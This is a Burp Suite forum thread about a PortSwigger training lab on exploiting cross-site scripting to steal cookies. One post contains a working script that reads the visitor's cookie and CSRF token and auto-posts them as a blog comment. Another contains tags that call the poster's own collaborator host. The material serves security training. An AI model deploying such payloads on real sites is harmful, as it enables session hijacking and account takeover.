Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

lab question

5ch00l | Last updated: Nov 05, 2019 01:44PM UTC

how am i supposed to steal cookies from this lab "Lab: Exploiting cross-site scripting to steal cookies" without having burp professional and without using Burp Collaborator client I've tried redirecting users to my site and making everyone that visits the blog post a comment but none of there two seems to work

Burp User | Last updated: Nov 05, 2019 02:50PM UTC

<form id="my_form" action="/post/comment" method="POST" enctype="application/x-www-form-urlencoded"> <input required type="hidden" name="postId" value="4"> <input type="hidden" id="coke" value="" name="comment"> <input required type="hidden" value="majname" name="name"> <input required type="hidden" value="majmail@gmail.com" name="email"> </form> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> <script> $(window).on('load', function(){ var a_csrf = document.getElementsByName('csrf')[0].value document.getElementById('coke').value = document.cookie; var inp = document.createElement('input'); inp.type="hidden"; inp.name="csrf"; inp.value=a_csrf; document.getElementById('my_form').appendChild(inp); document.getElementById('my_form').submit(); }); </script> this is my payload for commenting it works on myself but no bot seems to visit the blog tho

Liam, PortSwigger Agent | Last updated: Nov 05, 2019 04:08PM UTC

Instead of using Burp Collaborator, you could adapt the attack to make the victim post their cookie within a blog comment by exploiting the XSS to perform CSRF, although this would mean that the cookie value is exposed publicly, and also discloses evidence that the attack was performed.

Burp User | Last updated: Nov 05, 2019 07:11PM UTC

please read what i have written and not reply with a copy paste or is this an automated bot ?

Mike, PortSwigger Agent | Last updated: Nov 06, 2019 09:52AM UTC

Hi, the previous comment is valid and not written by a bot. If you were able to perform that action you would force the emulated admin user to submit their cookie as a comment, which you could then retrieve from the blog post and submit in your request to solve the lab. I have just checked the lab and It is working as intended as I have been able to solve it. There is a lab which allows you to practice exploiting XSS to perform CSRF at the following link which you could use to help you: https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf

Burp User | Last updated: Nov 08, 2019 08:22PM UTC

Hello. I had exactly the same issue and at really looks unsolvable. Could there by anything else wrong? Like different lab instances? My PoC works inside my browser, but otherwise no bot makes any request, I tried this for every postId several times. I have even tried to inject very simple HTML tags, like these below, but only HTTP connection I ever received was mine: <img src="https://MYDOMAIN.burpcollaborator.net"></img> <script src="https://MYDOMAIN.burpcollaborator.net/?aa"></script> Is there any other test you suggest I could perform to validate that the bot is visiting my post? Because clearly, it looks that he is not.

Burp User | Last updated: Nov 10, 2019 07:39AM UTC

Doing it a little differently than the explained solution, I can confirm that the lab is still solvable.

Liam, PortSwigger Agent | Last updated: Nov 11, 2019 08:45AM UTC

Thanks for this report t. I've passed on your message to our Web Academy team.

Burp User | Last updated: Nov 12, 2019 06:46AM UTC

Thanks, I noticed another weird thing, when I was doing https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration .. Again, the same situation, there was a DNS query to Burp Collaborator, but no HTTP request. Then I changed the URL to "exploit server" (so instead of collaborator, I verified the access logs and the HTTP request was really made) as someone suggested here: https://support.portswigger.net/customer/portal/questions/17576275-web-security-academy-blind-xxe-lab-3-exploiting-blind-xxe-to-exfiltrate-data-using-a-malicious- I also saw this video I googled https://www.youtube.com/watch?v=glA5FwCdspk about the solution and I did everything exactly the same way, but as mentioned, have not received the request. To summarise, it looks like the issue is that the HTTP request is not made to my collaborator, even when my collaborator is working correctly, as I validated via curl - it shows every HTTP request, but not from this lab. There is no possibility I made any typo as I verified everything several times.

Liam, PortSwigger Agent | Last updated: Nov 12, 2019 01:04PM UTC

Thanks for following up. We're currently investigating this issue.

Liam, PortSwigger Agent | Last updated: Nov 12, 2019 01:05PM UTC

This issue should know be resolved. Please let us know if you need any further assistance.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.